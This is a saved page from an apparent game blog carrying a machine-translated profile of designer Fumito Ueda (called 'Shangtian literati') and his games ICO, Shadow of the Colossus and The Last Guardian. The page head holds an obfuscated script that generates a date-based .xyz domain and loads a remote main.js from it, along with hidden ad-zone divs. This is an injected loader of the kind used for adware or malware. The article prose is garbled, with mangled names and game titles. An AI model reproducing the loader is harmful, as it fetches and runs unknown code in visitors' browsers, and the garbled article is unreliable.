<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="ICO, which is a familiar and unfamiliar name, now represents one of the most popular blockchain projects, and for gamers, it’s a very old existence. “ICO” is an action adventure game made by teamico i">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="ICO, which is a familiar and unfamiliar name, now represents one of the most popular blockchain projects, and for gamers, it’s a very old existence. “ICO” is an action adventure game made by teamico i">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/c6f6048bcf474b778d4fbbac908e7a5b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/b8ab63c17dfe4ffb9e725fd484d524a3.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/9f81d4b7facd4558b3bda058c7ee381c.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/5a0ef0fe99c3457bb5e9349d048cb69a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/fe6246577f434f4a95ffa7162fcbb597.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/1f8bf38fd6d84df1918fdfe8e0d31afb.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/466fdb8f620245a4b194d6a8f34cbe81.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/d557a9ad0bf64bef95127768294492ab.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:50.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati">
<meta name="twitter:description" content="ICO, which is a familiar and unfamiliar name, now represents one of the most popular blockchain projects, and for gamers, it’s a very old existence. “ICO” is an action adventure game made by teamico i">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/c6f6048bcf474b778d4fbbac908e7a5b.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>ICO, which is a familiar and unfamiliar name, now represents one of the most popular blockchain projects, and for gamers, it’s a very old existence. “ICO” is an action adventure game made by teamico in 2001. It has won numerous awards and public praise, but few people have heard of this game, let alone how many players have played it.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/c6f6048bcf474b778d4fbbac908e7a5b.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>“The game is as beautiful as poetry, and the person who created it is a great poet,” the players said. Throughout the whole game industry, many game producers will interpret their works as novels or films, and only the producer of ICO, the Shangtian literati, can express the game as “poetry”.</p>
<h1 id="“art”-is-an-extremely-important-subject"><a href="#“art”-is-an-extremely-important-subject" class="headerlink" title="“art” is an extremely important subject"></a>“art” is an extremely important subject</h1><p>Born in Hyogo, Japan, Shangtian literati like painting very much since childhood, and they are extraordinary. However, Shangtian literati not only like painting, but also have different ideas and views on things. In kindergarten, the school once organized a children’s painting competition, the topic was to draw a turtle. All the children drew a tortoise in a similar way. Of course, the literati Shangtian also drew a tortoise, but unlike other children, he only drew a tortoise shell. His family and teachers were curious about this. Why did he draw a turtle shell? The young Shangtian explained that it was “a turtle with its head and limbs in the shell”. From this we can see that Shangtian is more innovative than other children. After this, he was praised by his family and teachers. And it is after that that, Shangtian has confidence in painting creation.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/b8ab63c17dfe4ffb9e725fd484d524a3.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>Game producer Shangtian literati<br>In principle, the children who like painting should be the top students with stable personality and excellent performance, but the results of the cultural course in Tian are not obvious, which is largely related to his personality. Instead of letting him go to class, he is more willing to lock himself up to draw a picture for a day. In addition to painting, he also likes to go fishing by the river with his friends, or learn to make various tools and small toys with his father. It is not difficult to combine these hobbies. Shangtian is a very creative child. When he was in high school, he chose the nearest art vocational high school for his study. After three years of ignorance, he was admitted to Osaka Art University, not far from home. In fact, he could easily have been admitted to Tokyo Wumei, but he chose to give up because he was too far away.<br>Shangtian seems to take “energy saving” as the primary condition for all his future choices, even choosing the major of abstract painting that “looks easy”. However, after entering university, he didn’t do a good job in painting. He didn’t even go to his favorite art gallery. He didn’t know what he wanted to do in the future. All the reasons were that he was fascinated by another thing: video games.</p>
<p>#Because of interest<br>Near the time when Shangtian graduated from University, it was the stage when the local video game industry in Japan had just developed. Video games began to enter the homes of ordinary people. Shangtian and his roommate were usually bored playing games in their dormitories when they were free. “Since I don’t know what to do, I’d better buy a computer first. It’s useful anyway.”. With this in mind, Ueda purchased an Amiga personal computer. And out of the love for all kinds of art works, just by virtue of his computer graphics processing ability is relatively strong, so he began to study CG technology. Bookstores and online forums have become the most frequently visited places in Shangtian. In order to learn the production technology of CG, Shangtian has broken its leg. After graduating from University, he didn’t choose to find a job directly, but wanted to become an art creator by relying on his own skills. At that time, he realized that CG is a new technology, and the talents who master this technology are the hot spots of many companies, so he decided to find a company to be a CG designer.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/9f81d4b7facd4558b3bda058c7ee381c.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>Amiga PC<br>His first official job was as a game designer of warp company in Japan. When he joined in, he took over a major project: making an action adventure game named “strange spirit” for Sega Saturn mainframe. Although there are many ideas about this game, he is just a young employee. He can’t talk about the overall development of the game. He naturally has a strong personality with such a group and doesn’t come very far. Moreover, the producer of the game is a well-known and strict wise man, so it’s hard for him to fight here. To this, Shangtian was very reluctant, and decided to “finish this ticket, I will go and play my own game.”. At best or not, Shangtian is a man of love. After the completion of the research and development of strange spirits, he chose to leave quietly, go home and continue to study CG technology, and plan to make a game of his own.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/5a0ef0fe99c3457bb5e9349d048cb69a.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>“Strange spirits” game cover<br>In 1997, Mr. Shangtian learned from his friends that a company could recruit talents who could do CG again, but it was still a bit hard for him to rely on himself, which also made him have the intention of looking for a new job. Mr. Shangtian submitted his resume to the company, which was not someone else, but Sony Computer Entertainment SCE, which had just become popular in the game industry. When Sony asked him when he would be able to come to work, he said that he had not finished his work and could not come to work right away. “So how about borrowing this place for you?” Many years later, the strange character of Ueda was once again tolerated and recognized, which made him deeply moved. He immediately decided to join Sony and work hard here.</p>
<h1 id="three-no-games"><a href="#three-no-games" class="headerlink" title="three no games"></a>three no games</h1><p>Given Sony’s emphasis on Ueda, Ueda soon got the chance to make a game, and he hopes to take this opportunity to realize his dream a few years ago. In this game, the protagonist controlled by the player needs to protect a young girl and take her to escape from the devil’s claw. The core concept of the story is “never let go of this person’s hand, or you will give up your soul”. There are not a few lines in the full name of the game, which may not add up to a hundred words. There is no UI, no life value and no item column. The whole picture of the game is as clean as a picture, which is also called “three no games” by players.<br>However, if you look at this work from the current perspective, you will find that its design concept has been used in many game works, and the design of this game is undoubtedly very advanced. Shangtian named his work “ICO” a long time ago. After the game was released, it got unprecedented praise. The players can’t help but sigh that the experience of the game is too wonderful. It has the effect of pulling the players into the world and feeling the incomparable emotion and shock. But contrary to the word-of-mouth of the game, the sales volume of the game didn’t even exceed a million, which made this work not only a model in game design, but also a model of “good but not good”.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/fe6246577f434f4a95ffa7162fcbb597.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>ICO game screen<br>The unsatisfactory sales volume of the game is largely related to the unidentified cover design of the game’s name. At the same time, the information technology is not developed enough. Even if there are countless word-of-mouth explosions in the game, few people know about the game. But the high reputation of the game is enough to make Shangtian have the motivation to continue to play the game. This time, there is a very unique concept in his mind: if there is no growth in an RPG game, no brush off and level training, and only the boss war is reserved, what kind of play will this be?<br>A man, a sword, a bow, a horse, a giant statue like a mountain. This is Shangtian’s second work Wanda and the giant statue. In order to revive her lover, Wanda, the protagonist of the game, made a deal with the devil and killed 16 giant statues guarding the world. The tiny body of the protagonist and the towering colossus form a sharp contrast, which brings unprecedented sense of oppression to the players. In addition, Wanda and the Colossus give the players a question: what kind of price can one pay for one’s beloved? Many players can’t calm down for a long time after passing the customs. This is the effect the game wants to bring to the players.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/1f8bf38fd6d84df1918fdfe8e0d31afb.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>Wanda and Colossus<br>In the process of developing Wanda and the Colossus, Shangtian has created a new idea through the fetter between the protagonist and Aima agro. He wants to design a game work in the next game to let the protagonist and an unprecedented creature have fetter to work together. A long time ago, this vivid virtual creature was conceived in the consciousness of Shangtian. Shangtian said that he must try his best to make this creature to the extreme, just as it really exists. However, to reach such a level must mean high consumption and long time. The development cycle of the game drags on and misses the most suitable time to log in to the PS3 host. So Sony The high level decided to let the game skip PS3 and log in to PS4 directly, which caused the dissatisfaction of Ueda. He turned around and left the studio teamico with the core members. Sony did not give up the production of the game because of the departure of Ueda. After all, most of the concept and design of the game have been mature. Sony gave the development of the game to other studios, and sent someone to find Ueda, who has formed a group outside, to continue to cooperate with the development of the game.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/466fdb8f620245a4b194d6a8f34cbe81.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>Big Griffins like cats, dogs and eagles</p>
<h1 id="end"><a href="#end" class="headerlink" title="end"></a>end</h1><p>Just as the players were worried about the life and death of the new work, Sony released the game called “the last guardian”, which is still the familiar style and the familiar warmth. Shangtian once again played a beautiful poem for the players with his unique style. However, it seems to be Shangtian’s excessive pursuit of “literature and art atmosphere”. Although it has done very well in the picture, atmosphere and sense of substitution, it has a common fault of anti human operation. As the first condition of a game, it can make players play smoothly. In short, the advantages and disadvantages of Shangtian’s works are obvious. Therefore, many players buy the game without knowing it, which leads to the polarization of word-of-mouth, and the final sales volume can only be described as expected.<br><img src="http://maiygu.xyz/2019/11/08/Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati/d557a9ad0bf64bef95127768294492ab.jpg" alt="Use the whole body senses to enjoy an elegant performance, two and a half games of the poet Shangtian literati"><br>“The last guardian” Game Poster<br>Generally speaking, every concept of Shangtian’s game is very different. Although his game can’t be a blockbuster, it always belongs to a small part of people’s romance and even impresses the development of the game industry to some extent. The experience he brings to players is unprecedented. In 20 years, two and a half game works, each of which is a novel and unique feeling, will not conflict with each other, so that players can know who made the game as soon as they play. Now it’s nearly three years since the release of “the last guardian”. We are still in the position of the scholars who left Sony in the future. But at least one thing is certain that he will continue to write his elegant chapter with the game.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Want you money, want you liver, gradually become the trend of the small pass charging mode/" rel="next" title="Want you money, want you liver, gradually become the trend of the small pass charging mode">
                <i class="fa fa-chevron-left"></i> Want you money, want you liver, gradually become the trend of the small pass charging mode
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Updating to the extinction of the sun radiation 76, gives itself a problem that will not be solved/" rel="prev" title="Updating to the extinction of the sun radiation 76, gives itself a problem that will not be solved">
                Updating to the extinction of the sun radiation 76, gives itself a problem that will not be solved <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#“art”-is-an-extremely-important-subject"><span class="nav-number">1.</span> <span class="nav-text">“art” is an extremely important subject</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#three-no-games"><span class="nav-number">2.</span> <span class="nav-text">three no games</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#end"><span class="nav-number">3.</span> <span class="nav-text">end</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
